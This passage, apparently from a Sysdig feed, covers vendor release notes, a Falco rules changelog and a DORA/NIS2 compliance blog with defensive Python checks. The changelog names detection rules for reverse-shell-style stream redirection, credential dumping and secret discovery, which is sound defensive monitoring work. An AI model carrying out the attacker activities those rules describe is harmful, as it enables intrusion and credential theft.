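def images_with_kev(scan_results, kev_index):
    """The 'filter images by CISA KEV' view: images carrying at least one KEV CVE."""
    return sorted(image for image, findings in scan_results.items()
                  if any(item["in_kev"] for item in enrich(findings, kev_index)))


if __name__ == "__main__":
    kev = index_kev(KEV_CATALOG_EXCERPT)
    print("images with KEV vulnerabilities:", images_with_kev(SCAN_RESULTS, kev))
    for item in prioritize(SCAN_RESULTS["registry.example/api:1.4.2"], kev):
        flag = f"KEV, due {item['kev_due_date']}" if item["in_kev"] else "not in KEV"
        print(f"{item['cve']:<16} {item['severity']:<9} {flag}")
```

The due date in the catalog is the remediation deadline CISA sets for US federal agencies under BOD 22-01; it is a reasonable proxy SLA for everyone else, which is why the sort puts overdue KEV entries ahead of a Critical that nobody is known to be exploiting.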

Platform-Based Scanning

Sysdig has extended the Vulnerability Management scanning capabilities to conduct platform scanning by default. The scanning tools analyze images and host filesystems to extract the Software Bill of Materials (SBOM) and send them to the Sysdig backend for evaluation. Vulnerability matching and policy evaluation now occur within the Sysdig platform rather than on the client side.

Platform-based scanning aims to optimize computing resources, conserve data transfer, improve response time by eliminating client-side evaluation of images, and enhance the robust tracking of images across the user environment. For more information, see Platform-Based Scanning.

Improved GCP Cloud Account Onboarding

Sysdig has launched an improved onboarding experience for GCP Cloud Accounts. Users can specify their installation preferences regarding desired features. Sysdig then guides them through the installation process step-by-step, ensuring a seamless and personalized experience.

In addition, Sysdig’s Agentless CDR now supports threat detection on GCP. By leveraging Falco and its constantly updated rules managed by the Sysdig Threat Research Team, as well as custom rules tailored to specific environments and security requirements, users can connect their GCP accounts effortlessly while benefiting from robust event processing.

For details, see Connect Cloud Accounts | GCP.

Sysdig Monitor

Global Service Accounts

Sysdig has extended the functionality of team-based service accounts with global service accounts. Unlike team-based service accounts, global service accounts can perform actions that require system-level permissions. Admins can create a global service account through the API. See Global Service Accounts

Deactivate User Option

Sysdig has added the ability to configure a period of inactivity for a user, after which the user is deactivated. This helps large enterprises manage users automatically rather than manually deleting users from Sysdig.

This feature is deactivated by default. Currently, it can be enabled via API only.

For details, access the API documentation under User-Deactivation.

Sysdig Agents

13.0.2 March 20, 2024

This hotfix addresses the following:

  • Vulnerability fixes:
  • The issue in the legacy_ebpf driver that impacted RHEL kernel v5.14 with RHEL subversion 4.10 or higher has been fixed.
  • Kernel module build failure on Linux kernel 6.8 has been fixed.

13.0.1 March 11, 2024

This hotfix fixed an issue where the Sysdig Agent could retain allocated UDP ports until reaching port saturation, occurring under specific combinations of the driver used and enabled features.

13.0.0 March 06, 2024

We strongly recommend that you skip v13.0.0 and upgrade to Sysdig Agent v13.0.1. See Breaking Changes for more information.

Feature enhancements

Updated Docker Image to UBI9

Sysdig Agent’s Universal Base Image has been upgraded from UBI8 to UBI9.

Added Agent health metrics in secure_light Mode

Added the following health metrics when the agent is running in secure_light mode:

  • sysdig_agent_analyzer_num_evts
  • sysdig_agent_analyzer_dropped_evts

Support for TLS and basic authentication in Agent Prometheus Exporter

Agent Prometheus Exporter now supports TLS and basic authentications.

Ability to collect subattributes from JMX metrics

Added the ability to collect individual subattributes from CompositeData JMX metrics.

Availability of promscrape in ARM64 in FIPS Mode

Sysdig Agent now includes the FIPS-mode promscrape binary that was previously missing for ARM platforms.

Kill process in Workload

In Threat Detection Policies, Workload and List Matching policies can now be configured to kill the event-triggering process. For details, see Workload.

Breaking changes

As part of the Sysdig Agent 13.0.0 release, and as anticipated in the release notes for 12.20.0, Sysdig dropped support for:

  • logwatcher
  • RHEL6 and CentOS6

All Sysdig users affected by these changes have been notified. If you haven’t received any communication from Sysdig, it means there is no impact on your usage.

Defect fixes

Updated ssl_shim configuration

The ssl_shim configuration has been changed to fix an issue where the openssl.cnf bundled with the agent expected ssl_shim to select the FIPS or non-FIPS provider at startup. That configuration broke other programs that are dynamically linked against OpenSSL v3.

An openssl_conf configuration flag has been added so that users can specify a custom openssl.cnf file for the agent. To use a custom OpenSSL v3 library, set both openssl_conf and your library path; this configuration is required whenever openssl_lib points the agent to a custom OpenSSL v3.x library. See openssl_lib for more information.

Support for universal eBPF on 1-vcore machines

Universal eBPF is now supported on 1-vcore machines.

Scoping events to containers on specific Kubernetes clusters

The host scope resolution now works correctly when additional scope predicates are specified along with the standard container_id="". For example, container_id="" and kubernetes.cluster.name=my_cluster.

Fixed misleading collector reconnection attempts logs

Fixed an issue where agents reported a large number of logs with “No further retries left for attachment to container”.

Sysdig Cluster Shield Release Notes

Here are the most recent release notes for Sysdig Cluster Shield. Review the entries to learn about the latest features, defect fixes, and known issues.

0.7.0 March 18, 2024

Enhancements

  • Added new Kubernetes Metadata Collector (Technical Preview).
  • Added the ability to run in single process mode.
  • Updated configuration for the Container Vulnerability Management feature.
  • Enabled Platform Services by default. Added the ability to disable it through an additional Helm chart value containing the current on-premises version.
  • Removed configuration for Offline Analyzer.
  • Refactored the configuration for the registry certificate verification.

Defect fixes

Fixed a memory leak issue in the supervisor process.

0.1.0 March 07, 2024

Sysdig Cluster Shield released as controlled availability

Sysdig is delighted to announce the controlled availability of Sysdig Cluster Shield. This solution consolidates multiple agent deployments into a single containerized component, marking a significant advancement in simplifying the deployment, management, and configuration of the Sysdig suite of security and compliance tools at the cluster level. By streamlining operations for Kubernetes environments, Cluster Shield makes it easier than ever to maintain your security and compliance posture.

For more information, see Sysdig Cluster Shield.

Windows Agent

Container enrichment

The agent can now gain visibility into containerized processes, allowing containerd-based containers to be secured along with the host operating system.

Availability of Docker image for Windows Server v2019 and v2022

The Windows Agent is now available as a Docker image for Windows Server 2019 and Server 2022.

Defect fixes

Vulnerability fixes

Ability to handle wide characters from AmsiScanBuffer events

AMSI events carry a buffer parameter that contains the executed payload, such as a PowerShell cmdlet or a loaded .NET assembly. The structure of that parameter is dynamic and depends on the data source emitting the AMSI telemetry. The event parsing mechanism has therefore been adapted to treat the parameters as dynamic and to derive the content of the AMSI buffer as dictated by the application type emitting the event.

SDK, CLI, and Tools

Sysdig CLI

Sysdig CLI Scanner v1.8.6 is out!

  • Fixed CVE-2024-26147.
  • Now, Sysdig CLI scanner will honor proxy env vars when pulling images! 

Sysdig CLI Scanner v1.9.0 is out.

IAC

  • Fixed panic occurring during terraform directories scanning.
  • Fixed bug on severity threshold flag.
  • Exit code 1 is returned when violations exceed the threshold.
  • Use v2 endpoint to get data from transforms.

VM

  • Fixed a bug in maven matcher.
  • Make policies succeed if, for a vulnerability, the fix version is present while the solution date is not.

Fixed Vulns

  • CVE-2024-24786

https://sysdiglabs.github.io/sysdig-platform-cli

Python SDK

The latest version is v0.17.1. See the Sysdig Python SDK GitHub for details.

Terraform Provider

v1.22.0 is the latest version of  the Sysdig Terraform Provider. For more information, see our Terraform Provider docs.

Terraform Modules

  • AWS Sysdig Secure for Cloud remains unchanged at v0.10.9.
  • Terraform Google secure v0.1.10:
    • feat: Add module outputs for webhook-datasource #17
    • feat: agentless workload controller WIF #20
    • feat: Adding support for WIF based auth to Webhook Datasource module #21
    • feat(vm,cloud-scan): enables organizational use-case #23
    • test: Add validation test coverage #16
    • test(vm, cloud-scan): single-project use-case #18
    • ci: Update CODEOWNERS #19
    • ci: Update CODEOWNERS for workload scanning module #22
  • Terraform Azure remains unchanged at v0.2.10.

Falco VSCode Extension

v0.1.0 is still the latest release. 

Sysdig Cloud Connector

The Cloud Connector remains v0.16.61.

Admission Controller

Admission Controller remains at 3.9.37, with the Helm chart at 0.15.0.

Sysdig Secure Inline Scan Action

The latest release remains unchanged at v3.5.0.

https://github.com/marketplace/actions/sysdig-secure-inline-scan

Sysdig Secure Jenkins Plugin

The Sysdig Secure Jenkins Plugin remains at version v2.3.0.

https://plugins.jenkins.io/sysdig-secure

Prometheus Integrations

We have released v1.28.0: https://github.com/draios/prometheus-integrations/releases/tag/v1.28.0

  • ADD more scope to the quotas panels
  • ADD change for no data description for Keda panel
  • ADD rabbitMQ rule drop also by port
  • FIX typo in some dashboard descriptions
  • ADD Alert for Sysdig Monitor
  • Full Changelog: v1.27.0…v1.28.0

Sysdig On-premise

6.9.1 Hotfix Release, March 2024

This hotfix addresses the following:

  • Update the rules validator for the policies backend service to allow users to upgrade their default rules to the latest available ruleset.
  • The error during the upgrade process, caused by a missing import code for pvStorageSize.cassandra, has been fixed.
  • The issue where the installer incorrectly added a \n (line feed) to the context when current-context is used but the context is not specified in the values.yaml, or on the installer command line, has been resolved.
  • Cassandra failure during the Zookeeper upgrade process in the installer when override fields are used. To fix the issue, remove (or comment out) the customOverrides field:

    cassandra:
      jvmOptions: -Xms6G -Xmx8G
      # customOverrides: |
      #   compaction_throughput_mb_per_sec: 300

Upgrade Process

Supported upgrades from: 5.0.x, 5.1.x, 6.x

For the full supportability matrix and the on-premises installation documentation, see the On-Premises Install Documentation repository.

6.7.1 Hotfix Release, March 2024

This hotfix addresses an issue encountered during the zookeeper upgrade process in the installer, providing improved upgrade efficiency and speed.

Upgrade Process

Supported upgrades from: 5.0.x, 5.1.x, 6.x

For the full supportability matrix and the on-premises installation documentation, see the On-Premises Install Documentation repository.

6.4.5 Hotfix Release, March 2024

This hotfix fixes an issue with the slowness in the Secure UI.

Upgrade Process

Supported upgrades from: 5.0.x, 5.1.x, 6.x

For the full supportability matrix and the on-premises installation documentation, see the On-Premises Install Documentation repository.

Falco Threat Detection Rules Changelog

Several versions of the rules have been released in the last months. Below are the release notes for the most recent rules changes.

https://docs.sysdig.com/en/docs/release-notes/falco-rules-changelog

Rule Changes

  • Added the following rules:
    • Connection to SMB Server detected
    • Steganography Tool Detected
    • Python HTTP Server Started
    • Execute Process from Masqueraded Directory
    • Shared Libraries Reconnaissance Activity Detected
    • EC2 Instance Create User
    • Terminate EC2 Instances
    • Find Authentication Certificates
    • Contact GCP Instance Metadata Service from Host
    • Contact Azure Instance Metadata Service from Host
    • Execution from Temporary Filesystem
    • Data Split Activity Detected
    • Contact EC2 Instance Metadata Service From Host
  • Reduced false positives for the following rules:
    • Write below etc
    • Connection to IPFS Network Detected
    • nsenter Container Escape
    • Execution from Temporary Filesystem
    • Launch Root User Container
    • Linux Kernel Module Injection Detected
    • Packet socket created in container
    • Container escape via discretionary access control
    • Suspicious Access To Kerberos Secrets
    • Redirect STDOUT/STDIN to Network Connection in Host
    • Redirect STDOUT/STDIN to Network Connection in Container
    • Dump memory for credentials
    • Mount on Container Path Detected
    • Create Symlink Over Sensitive Files
    • Possible Backdoor using BPF
    • eBPF Program Loaded into Kernel
    • Launch Suspicious Network Tool in Container
    • Suspicious Cron Modification
    • Execution from /tmp
    • Launch Sensitive Mount Container
    • Non sudo setuid
    • Suspicious Domain Contacted
    • Modify Grub Configuration Files
    • Fileless Malware Detected
    • Find GCP Credentials
    • Ransomware Filenames Detected
    • Mount Launched in Privileged Container
    • Modification of pam.d detected
    • Kernel startup modules changed
    • Suspicious RC Script Modification
    • Find Authentication Certificates
    • Suspicious Operations with Firewalls
    • Kernel Module Loaded by Unexpected Program
  • Improved condition for the following rules:
    • Dump memory for credentials
    • Suspicious Access To Kerberos Secrets
    • Linux Kernel Module Injection Detected
    • Redirect STDOUT/STDIN to Network Connection in Host
    • Suspicious Cron Modification
    • Clear Log Activities
    • Modification of pam.d detected
    • Suspicious network tool downloaded and launched in container
    • Launch Suspicious Network Tool on Host
    • Launch Suspicious Network Tool in Container
    • Find GCP Credentials
    • Kernel Module Loaded by Unexpected Program
    • Describe Instances
    • Update Package Repository
  • Improved condition for the network_tool_procs macro.
  • Improved output for the following rules:
    • Discovery Security Service Activity Detected
    • Reconnaissance attempt to find SUID binaries
    • Dump memory for credentials
    • Kernel startup modules changed
    • Kernel Module Loaded by Unexpected Program
    • AWS rules – Event Summary
  • Improved description and tags for the Change memory swap options rule.
  • Improved tags for the AWS EC2 ruleset, the Suspicious Domain Contacted rule, and the GCP Create Cloud Function rule.
  • Improved MITRE tags for the AWS S3 ruleset.
  • Updated Indicators of Compromise rulesets with new findings.
  • Added Execute Process from Masqueraded Directory to managed policies.
  • Removed the Execute Process from Masqueraded Directory rule from managed policies.

Default Policy Changes

Removed from managed policies:

  • Execute Process from Masqueraded Directory

Added the following rules:

  • Python HTTP Server Started
  • Execute Process from Masqueraded Directory
  • Shared Libraries Reconnaissance Activity Detected
  • EC2 Instance Create User
  • Terminate EC2 Instances
  • Data Split Activity Detected
  • Contact EC2 Instance Metadata Service From Host
  • Find Authentication Certificates
  • Contact GCP Instance Metadata Service from Host
  • Contact Azure Instance Metadata Service from Host
  • Execution from Temporary Filesystem
  • Connection to SMB Server detected
  • Steganography Tool Detected

Updated policies for the following rules:

  • Mount on Container Path Detected
  • Modify Grub Configuration Files
  • Escape to host via command injection in process
  • Discovery Security Service Activity Detected
  • Java Process Class File Download

Open Source

Falco

Falco 0.37.1 is the latest stable release.

New Website Resources

Blogs 

Webinars

A practical guide to resource constraints in Kubernetes

SOAR into 2024: Harness the power of your cloud detection and response

Spring Cyber Solutions Fest

https://go.sysdig.com/Deminar-Fortify-Google-Cloud-Security.html

The First CNAPP with Out-of-the-Box NIS2 and DORA Compliance https://sysdig.com/blog/the-first-cnapp-out-of-the-box-nis2-and-dora-compliance/ Tue, 19 Mar 2024 14:30:00 +0000

The post The First CNAPP with Out-of-the-Box NIS2 and DORA Compliance appeared first on Sysdig.

In an era where cloud attacks and threats are happening very fast and constantly evolving, the European Union (EU) has stepped up its cybersecurity game with two new regulations: the Digital Operational Resilience Act (DORA) and the revised Directive on Security of Network and Information Systems (NIS2). With more strict requirements on compliance controls and breach disclosures, these regulations are set to transform how businesses manage their cyber risks in Europe. If you’re feeling overwhelmed by these changes, you’re not alone. That’s where Sysdig comes in. As the first CNAPP to offer out-of-box policies for DORA and NIS2 compliance, we’re here to guide you through these new requirements, ensuring your business isn’t just compliant, but also more secure.

Overview of DORA and NIS2

In the past, most regulations were checked periodically for compliance – maybe monthly, quarterly, or up to annually. However, to address the ongoing surge of cyberattacks and the speed at which they move, these new regulations are looking to implement stricter controls and, more importantly, very aggressive requirements around time to disclosure to regulatory authorities in the case of a security event, privacy event, or breach. In the case of DORA, you only have four hours from the moment of classification of the incident as major to disclose. With NIS2, you have 24 hours.

The Digital Operational Resilience Act (DORA) is a regulation introduced by the European Union to address and enhance the security and resilience of digital operations within the financial sector. It aims to consolidate and standardize digital operational resilience practices across financial entities, ensuring that they can withstand, respond to, and recover from all types of ICT (Information and Communication Technology) related disruptions and threats. The Regulation applies from Jan. 17, 2025, which means financial companies have less than a year to become compliant with DORA.

DORA applies to the vast majority of the financial services sector. This includes, but is not limited to:

  • Banks and credit institutions
  • Investment firms
  • Insurance companies
  • Asset managers
  • Payment service providers
  • Crypto-asset service providers

Additionally, DORA extends its reach to third-party ICT service providers, including cloud services, which are integral to the operations of financial entities. This is significant as it marks the first time financial services supervisors are given authority to oversee these third-party vendors directly. As it pertains to cloud, DORA also specifies that financial entities should use multi-cloud approaches to improve resiliency. Multi-cloud strategies can indirectly create other security gaps due to varied technology. This approach necessitates that appropriate unified controls and monitoring are implemented to ensure those security gaps aren’t exploitable.

Network and Information Systems Directive (NIS2) 

Unlike regulations, which are directly applicable, NIS2 is an EU directive that sets general objectives for Member States’ national laws on cybersecurity and ICT systems and networks, with the aim of strengthening security across the EU. 

The main goal of NIS2 is to significantly raise the level of cybersecurity across the EU by expanding the scope of the original directive, introducing stricter security requirements, and increasing the accountability of entities within critical sectors. 

NIS2 broadens the scope of cybersecurity obligations to include a wide range of sectors critical to the EU’s economy and society. It encompasses entities in energy, transport, banking, financial markets, healthcare, water supply, digital infrastructure, public administration, and space.


Sysdig’s Role in Facilitating NIS2 and DORA Compliance

Sysdig is the first Cloud-Native Application Protection Platform (CNAPP) to provide out-of-the-box compliance policies specifically designed to help organizations satisfy the technical elements of the European Union’s new regulatory frameworks, DORA and NIS2, as they pertain to cloud resources.

The text of DORA and NIS2 is dense, so a good practice is to break it down into its elementary building blocks. That is what the following section does.

DORA 

Sysdig facilitates this by providing comprehensive controls covering various aspects of Linux, Kubernetes, cloud environments, and identity management. 


These are some of the technical requirements that apply to cloud environments. We will explain these requirements and look at some examples of security controls from Sysdig that ensure cloud assets meet DORA compliance conditions. 

CHAPTER II, ICT risk management
Article 5, Governance and organization

Financial entities shall have in place an internal governance and control framework that ensures an effective and prudent management of ICT risk, in accordance with Article 6(4), in order to achieve a high level of digital operational resilience.

The management body of the financial entity shall define, approve, oversee, and be responsible for the implementation of all arrangements related to the ICT risk management framework referred to in Article 6(1).


Sysdig provides around 300 controls to ensure availability, authenticity, integrity, and confidentiality of data under this article.

Here are some examples:

API Server:
– Defined tls-cert-file and tls-private-key-file

IAM:
– Appropriate Service Accounts Access Key Rotation

Storage:
– S3 – Blocked Public Access (Account-wise)

Networking:
– Disabled Endpoint Public Access in Existing Clusters

Linux Security:
– /etc/bashrc or /etc/bash.bashrc contains an appropriate `TMOUT` setting

CHAPTER II, ICT risk management
Article 6, ICT risk management framework, Art 6.2

The ICT risk management framework shall include at least strategies, policies, procedures, ICT protocols, and tools that are necessary to duly and adequately protect all information assets and ICT assets. This will include computer software, hardware, servers as well as to protect all relevant physical components and infrastructures, such as premises, data centers and sensitive designated areas. It will also ensure that all information assets and ICT assets are adequately protected from risks including damage and unauthorized access or usage.

The ICT risk management framework must encompass comprehensive strategies, policies, procedures, and tools designed to safeguard all information and ICT assets. This includes software, hardware, servers, physical components, and more.

Sysdig supports these requirements through 190 controls and a multi-layered security approach that includes:

Identity security:
– IAM – No Multiple Access Keys

Workload protection:
– Workload mounting ServiceAccount Token

CHAPTER II, ICT risk management
Article 7, ICT systems, protocols, and tools

“In order to address and manage ICT risk, financial entities shall use and maintain updated ICT systems, protocols and tools that are:

(a) appropriate to the magnitude of operations supporting the conduct of their activities, in accordance with the proportionality principle as referred to in Article 4;
(b) reliable;
(c) equipped with sufficient capacity to accurately process the data necessary for the performance of activities and the timely provision of services, and to deal with peak orders, message or transaction volumes, as needed, including where new technology is introduced;
(d) technologically resilient in order to adequately deal with additional information processing needs as required under stressed market conditions or other adverse situations.”

This section of DORA is all about utilizing and keeping up-to-date ICT systems, protocols, and tools that are scalable, reliable, resilient, and high-performance.

Sysdig aids financial entities in meeting these requirements by providing:

Workload security:
– Container running as privileged

Kubernetes:
– Kubelet – Defined streaming-connection-idle-timeout
– Kubelet – Disabled hostname-override
– Kubelet – Disabled read-only-port
– Kubelet – Enabled make-iptables-util-chains
– Kubelet – Enabled protect-kernel-defaults

Audit Log:
– Audit Log Events – file system mounts
– Audit Log Events – kernel module loading and unloading

CHAPTER II, ICT risk management
Article 9, Protection and prevention, Art 9.3

“In order to achieve the objectives referred to in paragraph 2, financial entities shall use ICT solutions and processes that are appropriate in accordance with Article 4. Those ICT solutions and processes shall:

(a) ensure the security of the means of transfer of data;
(b) minimize the risk of corruption or loss of data, unauthorized access and technical flaws that may hinder business activity;
(c) prevent the lack of availability, the impairment of the authenticity and integrity, the breaches of confidentiality and the loss of data;
(d) ensure that data is protected from risks arising from data management, including poor administration, processing-related risks and human error.”

This Article emphasizes that financial entities must employ ICT solutions and processes that ensure data transfer security, minimize risks such as data corruption, unauthorized access, and technical issues, and prevent data availability, authenticity, integrity, confidentiality breaches, and data loss. These measures must also protect data from management-related risks, including administrative errors, processing hazards, and human mistakes.

Sysdig achieves this by means of controls like:

API Server:
– Defined strong cryptographic ciphers

Compute:
– Disabled connection to serial ports

Firewall Configuration:
– IPv4 – firewall rules
– Networking – disallowed default network

These are just some examples of the technical requirements of DORA. Our comprehensive policy extends beyond these examples.

NIS2

NIS2 requirements are very similar to DORA but with a different scope. NIS2 covers all critical infrastructure companies. The scope of critical infrastructure is massive, including the expected healthcare providers, utilities, and telecom providers, but also digital service providers. Entities fall within essential or important categories with different control requirements, monitoring provisions, and attestation levels. 

Sysdig covers the 14 technical requirements of NIS2 with 2,905 controls in total.

Most of the technical requirements are under Article 21, “Cybersecurity risk-management measures,” of Chapter IV, “Cybersecurity Risk-Management measures and reporting obligations.” Here are some of the technical requirements.  

Sysdig NIS2 and DORA compliance
“Member States shall ensure that essential and important entities take appropriate and proportionate technical, operational and organizational measures to manage the risks posed to the security of network and information systems which those entities use for their operations or for the provision of their services, and to prevent or minimize the impact of incidents on recipients of their services and on other services.

Taking into account the state-of-the-art and, where applicable, relevant European and international standards, as well as the cost of implementation, the measures referred to in the first subparagraph shall ensure a level of security of network and information systems appropriate to the risks posed. When assessing the proportionality of those measures, due account shall be taken of the degree of the entity’s exposure to risks, the entity’s size and the likelihood of occurrence of incidents and their severity, including their societal and economic impact.”
NIS2 requires entities to adopt suitable measures across technical, operational, and organizational domains to manage security risks for their network and information systems, aiming to reduce the impact of incidents. These measures should align with the latest standards and be cost-effective, reflecting the entity’s risk exposure, size, and potential incident impacts.

Sysdig addresses this through over 200 controls. Here are some examples:
– Compute – Installed latest OS patches
– Container permitting root
– Logging – Enabled Cluster Logging AKS/EKS
– SQL Server – Enabled periodic recurring scans
– SSH Server Configuration Permissions – public host key files

Article 21.2(d)
“The measures referred to in paragraph 1 shall be based on an all-hazards approach that aims to protect network and information systems and the physical environment of those systems from incidents, and shall include at least the following: supply chain security, including security-related aspects concerning the relationships between each entity and its direct suppliers or service providers.”
The key focus is on securing the supply chain, which involves addressing security aspects in the relationships between entities and their direct suppliers or service providers.

Sysdig can facilitate compliance with this requirement through over 200 controls, and here are some examples:

Secure SDLC:
– Registry – Enabled Vulnerability Scanning
– Registry – Read-only access

Logging:
– Logging – Enabled cluster logging

Access control:
– Over-permissive access to resource types in group

Secret:
– Secrets Management

These are just some examples of the technical requirements of NIS2. Our comprehensive policy extends beyond these examples.
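As an added illustration (this is not Sysdig's code and not the text of its control definitions), the following Python sketch shows how two of the control types named in the DORA and NIS2 lists above, "API Server – Defined strong cryptographic ciphers" and "Container permitting root", can be evaluated as policy-as-code against constructed inputs: a kube-apiserver command line as it would appear in a static pod manifest, and a Kubernetes Pod spec. The allow-list of "strong" cipher suites, the sample manifests, and the rule for what counts as permitting root are assumptions made for the example.

```python
"""Added example: evaluating two compliance controls as code.

Inputs are constructed inline; the cipher allow-list and the root-detection
rule are assumptions for illustration, not Sysdig's control definitions.
"""

# Assumed allow-list: TLS 1.2 ECDHE + AEAD suites, by their Go/kube-apiserver names.
STRONG_CIPHERS = frozenset({
    "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305",
    "TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305",
})


def apiserver_ciphers_strong(command):
    """Control 'API Server – Defined strong cryptographic ciphers'.

    `command` is the kube-apiserver argv as listed in a static pod manifest.
    Returns (passed, reason). Fails when the flag is absent, because the
    server then falls back to the TLS library defaults rather than an
    explicitly reviewed list.
    """
    for arg in command:
        if arg.startswith("--tls-cipher-suites="):
            suites = [s for s in arg.split("=", 1)[1].split(",") if s]
            weak = sorted(s for s in suites if s not in STRONG_CIPHERS)
            if weak:
                return False, "weak cipher suites configured: " + ", ".join(weak)
            return True, "only strong cipher suites configured"
    return False, "--tls-cipher-suites not set; library defaults apply"


def containers_permitting_root(pod):
    """Control 'Container permitting root' (assumed rule).

    A container is flagged when it may start as UID 0: an explicit runAsUser
    of 0, or no runAsUser together with runAsNonRoot not being true. The
    container-level securityContext overrides the pod-level one.
    """
    spec = pod.get("spec", {})
    pod_sc = spec.get("securityContext") or {}
    flagged = []
    for c in spec.get("containers", []):
        sc = c.get("securityContext") or {}
        run_as_user = sc.get("runAsUser", pod_sc.get("runAsUser"))
        run_as_non_root = sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot"))
        if run_as_user is not None:
            permits_root = run_as_user == 0
        else:
            permits_root = run_as_non_root is not True
        if permits_root:
            flagged.append(c["name"])
    return flagged


# Constructed sample inputs (not taken from any real cluster).
WEAK_APISERVER_CMD = [
    "kube-apiserver",
    "--advertise-address=10.0.0.1",
    "--tls-cipher-suites=TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,"
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
]
STRONG_APISERVER_CMD = [
    "kube-apiserver",
    "--advertise-address=10.0.0.1",
    "--tls-cipher-suites=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,"
    "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305",
]
SAMPLE_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web"},
    "spec": {
        "securityContext": {"runAsNonRoot": True},
        "containers": [
            {"name": "app", "image": "example/app:1.0"},          # inherits runAsNonRoot
            {"name": "sidecar", "image": "example/sidecar:1.0",
             "securityContext": {"runAsUser": 0}},               # explicit root: flagged
            {"name": "worker", "image": "example/worker:1.0",
             "securityContext": {"runAsUser": 1000}},            # non-root UID
        ],
    },
}


def run_checks(command=WEAK_APISERVER_CMD, pod=SAMPLE_POD):
    """Evaluate both controls and return a findings summary."""
    ciphers_ok, reason = apiserver_ciphers_strong(command)
    return {
        "apiserver_strong_ciphers": ciphers_ok,
        "apiserver_reason": reason,
        "containers_permitting_root": containers_permitting_root(pod),
    }


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(f"{key}: {value}")
```

Running the block as written reports the 3DES suite on the sample API server command line and flags the `sidecar` container, while `app` passes because it inherits the pod-level `runAsNonRoot`. The same two functions can be pointed at real manifests read from disk or from the API; the value of encoding a control this way is that the evidence for an auditor is the rule itself plus its inputs, not a screenshot.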

Conclusion

In conclusion, the NIS2 directive and DORA regulations mark significant milestones in the European Union’s journey towards stronger cybersecurity and operational resilience, particularly within critical sectors and the financial industry. Set to come into effect in January 2025, these comprehensive frameworks necessitate that affected entities — spanning a broad array of sectors — implement robust measures to protect their network and information systems against a wide range of cyber threats.

In this pivotal moment, Sysdig stands out as the first Cloud-Native Application Protection Platform (CNAPP) to offer out-of-the-box policies to assist in NIS2 and DORA compliance. This unparalleled readiness positions Sysdig not just as a tool, but as a strategic partner for businesses seeking to navigate the impending regulatory landscape confidently.

To learn more about compliance and regulations in cloud-native environments, watch our panel conversation: Delivering Secure, Compliant Financial Services in the Cloud.

The post The First CNAPP with Out-of-the-Box NIS2 and DORA Compliance appeared first on Sysdig.
